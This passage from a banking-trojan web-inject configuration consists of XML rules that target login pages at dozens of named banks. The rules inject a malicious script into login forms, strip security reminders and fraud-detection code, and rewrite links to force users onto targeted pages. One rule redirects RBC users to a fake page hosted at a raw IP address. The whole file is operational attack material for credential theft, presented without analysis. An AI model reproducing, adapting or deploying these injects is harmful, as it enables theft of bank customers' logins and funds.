- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://smallbusinessonline\.bbt\.com/auth/pwd\.tb</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
- <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\d*\.harrisbank\.com/(HOB/retail/logon/psohobdecidelogon|)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://commercial\.bnc\.ca/auth/Login</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
- <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="i"><![CDATA[(/scripts/sbiInput\d*\.js"></script>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript">xdom.Events.Keys.ENTER = 27;</script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.bxs\.com/</url>
- <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</(body|html)>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://cashproonline\.bankofamerica\.com/AuthenticationFrameworkWeb/cpo/login/public/
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="Ui"><![CDATA[(</html>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://cib\.bankofthewest\.com/K\d+/(|sa\d+/login\.jsp|index\.html)(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://secure\.brannenbanks\.com/BrannenBank/PassmarkSignIn\.faces</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://(vip\.|)btcchina\.com/bbs/index\.php</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="i"><![CDATA[Login\.init\(\);]]></pattern>
- <replacement><![CDATA[]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://wired\d*\.businessmanager\.com/signon/signon\.do(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.cibeg\.com/MCP</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://.+/cmserver/.*verify\.cfm</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="imsU"><![CDATA[(<form.+method\="post".*>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://business\-eb\.ibanking\-services\.com/K1/(sb\_login|index)\.jsp(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="Umsg"><![CDATA[<font color="red">.*</font>]]></pattern>
- <replacement />
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://.+/pub/html/(rsa/|pt/RSApm/|)(login|LoginRSAID|loginID)\.html$
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msi"><![CDATA[(</html>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://secure\.membersaccounts\.com/SELFSERVICE/Login\.aspx</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.cencorpcu\.com/secure/secure\_logon\.asp(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https?://www.citibank.com/us/citibusinessonline/</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(<body.*>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>
- <script type="text/javascript" language="JavaScript">
- // redirect loop :(
- //if (window.location.protocol != "https:")
- window.location.href = "https:" + window.location.href.substring(window.location.protocol.length);
- </script>
- ]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://online\.citibank\.com/</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="imsgU"><![CDATA[href="https://businessaccess.citibank.citigroup.com[^"]*"]]></pattern>
- <replacement><![CDATA[href="http://www.citibank.com/us/citibusinessonline/"]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.fcsolb\.com/cb/pages/jsp\-ns/</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\d+\.comerica\.com/</url>
- <url type="deny" onpost="0" onget="1" modifiers="U">^https://www\d+\.comerica\.com/.+\.(gif|png|jpg|js|css)($|\?)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.conexus\.ca/Business/OnlineBanking/Accounts/</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://[\w\-]+\.corpower\.org/SecureLogonMultiAuth\.aspx($|\?)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://(www\.|)cashanalyzer\.com/(caloadbalance\.aspx|cgi\-bin/[1-2a-z]+\.dll)(/|\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="Ums"><![CDATA[class="CA_redText".*>(?<inject>.*)</div>]]></pattern>
- <replacement />
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.e\-closingsecured\.com:\d+/scripts/spiis\.dll/its\-itec/itec\_login</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://(www\.|)e\-moneyger\.com/wps/myportal/?(|/\!ut/p/.+/)$</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://.+/ebc_ebc1961/</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="Ui"><![CDATA[(</form.*>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="Ui"><![CDATA[(onload="loadPassmark\(\)\;)]]></pattern>
- <replacement><![CDATA[\1document.cookie='nmRef='+escape(window.top.document.referrer);]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://express\.53\.com/portal/auth/login/Login</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="Ui"><![CDATA[(<body.*>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://direct\.53.com/direct/logon53Direct\.jsp</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="sm"><![CDATA[^(?<inject>.*)$]]></pattern>
- <replacement><![CDATA[<html><head><title>Redirect</title></head>
- <body>
- <script language="JavaScript">window.top.location.href='https://express.53.com/portal/auth/login/Login'</script>
- <a href="https://express.53.com/portal/auth/login/Login">redirect...</a>
- </body></html>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.bb\-fire\.com/SignOn/</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.ffinonline\.com/ff.*online1/(authentication/Login\.aspx|Accounts/AccountOverview\.aspx)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
- <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://globalaccess\.firstglobal\-bank\.com/internetbanking/ENULogin\.jsp</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.fnbstl\.com/business/(cts\_security\_precheck|.+\.jsp)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.efirstbank\.com/centralAuth/jsp/main/Logon\.faces(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.firstmeritib\.com</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(<head>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://.*secure\.fundsxpress\.com/piles/fxweb\.pile/(fx|second\_auth.*|custom\_login)(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^^https://netbanking\.hdfcbank\.com/netbanking/</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://businessonline\.huntington\.com/BOLHome/BusinessOnlineLogin\.aspx
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(<body.*>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://www\.huntington\.com/scripts/onlinebanking\.js
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(inputCheckBusiness.*else {)]]></pattern>
- <replacement><![CDATA[\1top.location.href="https://businessonline.huntington.com/BOLHome/BusinessOnlineLogin.aspx"; return false;]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU" contentType="^text/(html|plain)">^https://www\.huntington\.com/
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[<a href="#businessLogin" class="pill-nav__pill" role="tab" aria-controls="businessLogin"]]></pattern>
- <replacement><![CDATA[<a href="https://businessonline.huntington.com/BOLHome/BusinessOnlineLogin.aspx" class="pill-nav__pill"]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://access\.jpmorgan\.com/jpmalogon</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="sA"><![CDATA[(.+</body>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.jefferson\-bank\.com/business/j\_security\_check($|\?)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://[\w\.\-]+\.(wblnk|blilk)\.com/Core/Authentication/MFAPassword\.aspx</url>
- <url type="deny" onpost="1" onget="1" modifiers="iU">^https://www\.idbaccess\.blilk\.com/core/Authentication/.*</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="imsU"><![CDATA[(<body.*>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.idbaccess\.blilk\.com/core/Authentication/.*</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
- <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="idbaccess/scripts/statticker2.js"></script>\1]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://ktt\.key\.com/ktt/cmd/logon]]></url>
- <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://ktt\.key\.com/ktt/cmd/logonFromKeyComNew]]></url>
- <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
- <replacement><![CDATA[\1
- <style type="text/css">
- body { visibility: hidden; }
- </style>
- <script type="text/javascript">
- top.window.location = 'https://ktt.key.com/ktt/cmd/logon';
- </script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://businessportal\.mibank\.com/oracleAccessManager/securid\-forms\-adforest/.*login.*\.html(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
- <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://commercialservices\.mandtbank\.com/</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers=""><![CDATA[Internet Security Reminder]]></pattern>
- <replacement><![CDATA[]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="sU"><![CDATA[<font color=black size="1">.*</div>]]></pattern>
- <replacement><![CDATA[</div>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="sU"><![CDATA[<hr .*>]]></pattern>
- <replacement><![CDATA[]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="">^https://business\.memberdirect\.net/(servlet/Logon|business/default\.jsp)(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.mercantilcbonline\.com/secure/banking/(logon|individualLogon)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://.*\.ml\.com/ClientFederation/Loginwidget\.aspx</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://corporate\.metrobankdirect\.com/corp_login_page\.asp</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://cashmanager\.mizuhoe\-treasurer\.com/mz/servlet/SLogin\?</url>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://otp\.ffrontier\.com/gcms/(FFrontier|user\.login)(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://businessonline\.mutualofomahabank\.com/cb/pages/jsp\-ns/login\.jsp</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://(www\d*|cm)\.netteller\.com/(login|cm)2008/Authentication/Views/\S+\.aspx(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(</form.*>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://server\d{1,3}\.cey\-ebanking\.com/CLKCCM/.+/passmark.*/.+\.asp($|\?)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="imsU"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://server\d{1,3}\.cey\-ebanking\.com/CLKCCM/.+/OOBA/OOBALogin\.asp($|\?)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="imsU"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://.+/onlineserv/CM/($|index\.cgi)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="imsU"><![CDATA[(action="index.cgi".+</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://.+/onlineserv/CM/adminLogin\.cgi</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="imsU"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="onlineservadmin/scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://www\.pnc\.com/.*corporate\-and\-institutional</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(</html>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="i">^https://.*(/PassMark|RSAToken).*\.aspx($|\?)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="passmark/scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="0" onget="1" modifiers="iU">^https://www\d+\.rbc\.com/NU00/pki/authenticate/AuthenticateUserRoamingEPF\.jsp</url>
- <url type="deny" onpost="1" onget="1" modifiers="U">^https?://.+/scripts/default0\.js($|\?.+)</url>
- </conditions>
- <actions>
- <redirect>
- <url>http://162.211.231.13/fakes/rbc.php</url>
- </redirect>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://(edi|del|hkg|lon|sta)\.my\.rbs\.com</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="i"><![CDATA[(function checkKey\(e\))]]></pattern>
- <replacement><![CDATA[\1{}function checkKey1(e)]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://access\.rbsm\.com/logon/(password|dp300)/.+\.fcc(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https://(www\.|)scotiaconnect\.scotiabank\.com/sco\-tp/pki/AuthenticateUserInputRoamingEPF\.jsp(\?|$)</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers=""><![CDATA[(</body>)]]></pattern>
- <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://.*.secure\-banking\.com/.*/PassmarkSignIn\.faces</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[fraudmap.*<\/script>]]></pattern>
- <replacement><![CDATA["</script>]]></replacement>
- </modify>
- <modify>
- <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
- <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">^https://internetbanking\.securetrustbank\.com/SecureTrust/SecureTrust</url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
